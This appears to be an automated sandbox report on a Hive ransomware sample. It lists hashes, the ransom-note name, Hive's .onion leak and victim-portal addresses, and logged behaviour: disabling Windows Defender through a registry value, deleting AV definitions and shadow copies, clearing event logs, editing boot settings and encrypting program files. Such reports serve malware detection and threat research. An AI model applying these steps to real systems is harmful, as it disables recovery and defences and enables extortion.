Analysis
-
max time kernel
122s -
max time network
133s -
platform
windows7_x64 -
resource
win7-en-20211104 -
submitted
22-11-2021 11:03
Static task
static1
Behavioral task
behavioral1
Sample
20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe
Resource
win7-en-20211104
Behavioral task
behavioral2
Sample
20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe
Resource
win10-en-20211014
General
-
Target
20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe
-
Size
3.3MB
-
MD5
0ab044581b75da84b0e929590638095e
-
SHA1
1e907df240eadb3d27d145d50da9025d524728fd
-
SHA256
20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042
-
SHA512
168120b07437e3e6664128f0e23f6792b714d3ffa41131f7027099c0a5bd2dc0b538dd53fedb4cfadbcb9ea07ebae75c67b0e8bd2c6054aa991a3bdf8e42dbb7
Malware Config
Extracted
C:\Program Files\7-Zip\etrU_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 2056 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1904 bcdedit.exe 816 bcdedit.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Ceuta.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_iYDvqmxXpKo0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_vLO8wFan5-Y0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_box_bottom.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0174635.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_YjTeSzooVr40.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18248_.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_Zm7uFuxIBlo0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Media Player\de-DE\WMPDMCCore.dll.mui 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\css\calendar.css 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File created C:\Program Files (x86)\Microsoft Office\Office14\ACCWIZ\etrU_HOW_TO_DECRYPT.txt 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\join.avi 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\en-US\js\weather.js 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_AtNTsYlVR-80.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196110.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_eIuFCqQwxuE0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21331_.GIF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_n-kWE_CsgP00.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME40.CSS.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_ciKQZpADwDM0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\square_h.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_AkOCIFaqZso0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_TexturedBlue.gif.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_j3xSau2AAKg0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\en-US\etrU_HOW_TO_DECRYPT.txt 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_BzspYawFMsk0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme_0.9.300.v20140424-2042.jar.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_iM964rekonc0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\sRGB.pf.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_ZfEQ8wAQmD00.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\br\LC_MESSAGES\vlc.mo.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_zhWJDcAgThA0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198447.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_L2q4JQ887M00.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\CommsOutgoingImage.jpg.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b__hPogyV-bk00.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\ja-JP\js\RSSFeeds.js 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\ExportRequest.jtx.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_JHA5KFd5Uks0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\FormatExit.htm.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_vAMrbCS2H9c0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Jayapura.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_y91XdBH9x2Q0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\doclib.gif.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_yHHTJK5etN40.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_p-onbgsTrhw0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGBORDER.XML.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_M-l66Raxg9k0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\etrU_HOW_TO_DECRYPT.txt 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationRight_ButtonGraphic.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Performance\Title_Trans_Notes_PAL.wmv 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Montreal.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_Whwy7Ij88To0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\5.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\ParentMenuButtonIcon.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\feature.properties.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_TdY6B5Q-px40.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.IE.XML.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_TuNtkB8Bpio0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\redStateIcon.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Updater6\AdobeUpdate.cer.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_hidwED7GGYM0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241041.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_6YC1WsxzmAA0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\GMT.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_40QimrYSuMI0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Windows Media Player\en-US\WMPDMCCore.dll.mui 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01628_.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_Dw99rLnslfM0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185842.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_d-WpmdNGC4U0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01478U.BMP.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_Id2Y5OcE0XI0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_underline.gif.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_-3QSW2PoYf80.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\HAMMER.WAV.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_AGh4x-vVTLE0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\drvSOFT.x3d.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_VV14SG4Az-40.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152890.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_T3sG3EhKcGM0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\WB01296_.GIF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_BnSxLZ4oWq80.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21316_.GIF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_7BH0LOIAz1Y0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\etrU_HOW_TO_DECRYPT.txt 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\5.png 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_LMxKzus3Udc0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Hong_Kong.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_gvcoLT7BeI80.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_JQm8MYwKZv00.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\fr-FR\msadcer.dll.mui 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0172067.WMF.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_0ewA-9WimiA0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_PXQShX9tA8A0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN096.XML.oSJ00ZxuRmg1qEWmWNAfX-eKtJMyMfL_7JgYeB5y90b_qObKfptyr6o0.mhkwl 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe File opened for modification C:\Program Files\Windows Media Player\de-DE\wmplayer.exe.mui 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1688 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
pid Process 2428 NOTEPAD.EXE -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2088 powershell.exe 2176 powershell.exe 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeSecurityPrivilege 1460 wevtutil.exe Token: SeBackupPrivilege 1460 wevtutil.exe Token: SeSecurityPrivilege 668 wevtutil.exe Token: SeBackupPrivilege 668 wevtutil.exe Token: SeSecurityPrivilege 924 wevtutil.exe Token: SeBackupPrivilege 924 wevtutil.exe Token: SeIncreaseQuotaPrivilege 1704 wmic.exe Token: SeSecurityPrivilege 1704 wmic.exe Token: SeTakeOwnershipPrivilege 1704 wmic.exe Token: SeLoadDriverPrivilege 1704 wmic.exe Token: SeSystemProfilePrivilege 1704 wmic.exe Token: SeSystemtimePrivilege 1704 wmic.exe Token: SeProfSingleProcessPrivilege 1704 wmic.exe Token: SeIncBasePriorityPrivilege 1704 wmic.exe Token: SeCreatePagefilePrivilege 1704 wmic.exe Token: SeBackupPrivilege 1704 wmic.exe Token: SeRestorePrivilege 1704 wmic.exe Token: SeShutdownPrivilege 1704 wmic.exe Token: SeDebugPrivilege 1704 wmic.exe Token: SeSystemEnvironmentPrivilege 1704 wmic.exe Token: SeRemoteShutdownPrivilege 1704 wmic.exe Token: SeUndockPrivilege 1704 wmic.exe Token: SeManageVolumePrivilege 1704 wmic.exe Token: 33 1704 wmic.exe Token: 34 1704 wmic.exe Token: 35 1704 wmic.exe Token: SeIncreaseQuotaPrivilege 1384 wmic.exe Token: SeSecurityPrivilege 1384 wmic.exe Token: SeTakeOwnershipPrivilege 1384 wmic.exe Token: SeLoadDriverPrivilege 1384 wmic.exe Token: SeSystemProfilePrivilege 1384 wmic.exe Token: SeSystemtimePrivilege 1384 wmic.exe Token: SeProfSingleProcessPrivilege 1384 wmic.exe Token: SeIncBasePriorityPrivilege 1384 wmic.exe Token: SeCreatePagefilePrivilege 1384 wmic.exe Token: SeBackupPrivilege 1384 wmic.exe Token: SeRestorePrivilege 1384 wmic.exe Token: SeShutdownPrivilege 1384 wmic.exe Token: SeDebugPrivilege 1384 wmic.exe Token: SeSystemEnvironmentPrivilege 1384 wmic.exe Token: SeRemoteShutdownPrivilege 1384 wmic.exe Token: SeUndockPrivilege 1384 wmic.exe Token: SeManageVolumePrivilege 1384 wmic.exe Token: 33 1384 wmic.exe Token: 34 1384 wmic.exe Token: 35 1384 wmic.exe Token: SeIncreaseQuotaPrivilege 1384 wmic.exe Token: SeSecurityPrivilege 1384 wmic.exe Token: SeTakeOwnershipPrivilege 1384 wmic.exe Token: SeLoadDriverPrivilege 1384 wmic.exe Token: SeSystemProfilePrivilege 1384 wmic.exe Token: SeSystemtimePrivilege 1384 wmic.exe Token: SeProfSingleProcessPrivilege 1384 wmic.exe Token: SeIncBasePriorityPrivilege 1384 wmic.exe Token: SeCreatePagefilePrivilege 1384 wmic.exe Token: SeBackupPrivilege 1384 wmic.exe Token: SeRestorePrivilege 1384 wmic.exe Token: SeShutdownPrivilege 1384 wmic.exe Token: SeDebugPrivilege 1384 wmic.exe Token: SeSystemEnvironmentPrivilege 1384 wmic.exe Token: SeRemoteShutdownPrivilege 1384 wmic.exe Token: SeUndockPrivilege 1384 wmic.exe Token: SeManageVolumePrivilege 1384 wmic.exe Token: 33 1384 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1520 wrote to memory of 536 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 29 PID 1520 wrote to memory of 536 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 29 PID 1520 wrote to memory of 536 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 29 PID 536 wrote to memory of 1604 536 net.exe 31 PID 536 wrote to memory of 1604 536 net.exe 31 PID 536 wrote to memory of 1604 536 net.exe 31 PID 1520 wrote to memory of 1220 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 32 PID 1520 wrote to memory of 1220 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 32 PID 1520 wrote to memory of 1220 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 32 PID 1220 wrote to memory of 1172 1220 net.exe 34 PID 1220 wrote to memory of 1172 1220 net.exe 34 PID 1220 wrote to memory of 1172 1220 net.exe 34 PID 1520 wrote to memory of 1132 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 35 PID 1520 wrote to memory of 1132 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 35 PID 1520 wrote to memory of 1132 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 35 PID 1132 wrote to memory of 1996 1132 net.exe 37 PID 1132 wrote to memory of 1996 1132 net.exe 37 PID 1132 wrote to memory of 1996 1132 net.exe 37 PID 1520 wrote to memory of 392 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 38 PID 1520 wrote to memory of 392 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 38 PID 1520 wrote to memory of 392 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 38 PID 392 wrote to memory of 1672 392 net.exe 40 PID 392 wrote to memory of 1672 392 net.exe 40 PID 392 wrote to memory of 1672 392 net.exe 40 PID 1520 wrote to memory of 1800 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 41 PID 1520 wrote to memory of 1800 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 41 PID 1520 wrote to memory of 1800 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 41 PID 1800 wrote to memory of 1700 1800 net.exe 43 PID 1800 wrote to memory of 1700 1800 net.exe 43 PID 1800 wrote to memory of 1700 1800 net.exe 43 PID 1520 wrote to memory of 1476 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 44 PID 1520 wrote to memory of 1476 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 44 PID 1520 wrote to memory of 1476 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 44 PID 1476 wrote to memory of 1912 1476 net.exe 46 PID 1476 wrote to memory of 1912 1476 net.exe 46 PID 1476 wrote to memory of 1912 1476 net.exe 46 PID 1520 wrote to memory of 1440 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 47 PID 1520 wrote to memory of 1440 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 47 PID 1520 wrote to memory of 1440 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 47 PID 1440 wrote to memory of 1684 1440 net.exe 49 PID 1440 wrote to memory of 1684 1440 net.exe 49 PID 1440 wrote to memory of 1684 1440 net.exe 49 PID 1520 wrote to memory of 1204 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 50 PID 1520 wrote to memory of 1204 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 50 PID 1520 wrote to memory of 1204 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 50 PID 1204 wrote to memory of 1184 1204 net.exe 52 PID 1204 wrote to memory of 1184 1204 net.exe 52 PID 1204 wrote to memory of 1184 1204 net.exe 52 PID 1520 wrote to memory of 1908 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 53 PID 1520 wrote to memory of 1908 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 53 PID 1520 wrote to memory of 1908 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 53 PID 1520 wrote to memory of 1744 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 55 PID 1520 wrote to memory of 1744 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 55 PID 1520 wrote to memory of 1744 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 55 PID 1520 wrote to memory of 2004 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 57 PID 1520 wrote to memory of 2004 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 57 PID 1520 wrote to memory of 2004 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 57 PID 1520 wrote to memory of 1420 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 59 PID 1520 wrote to memory of 1420 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 59 PID 1520 wrote to memory of 1420 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 59 PID 1520 wrote to memory of 2044 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 61 PID 1520 wrote to memory of 2044 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 61 PID 1520 wrote to memory of 2044 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 61 PID 1520 wrote to memory of 988 1520 20a2250d93226c25246b32f6dabbe7a876c60843e487c8e7aed76dd0aba23042.exe 63
Processes
-
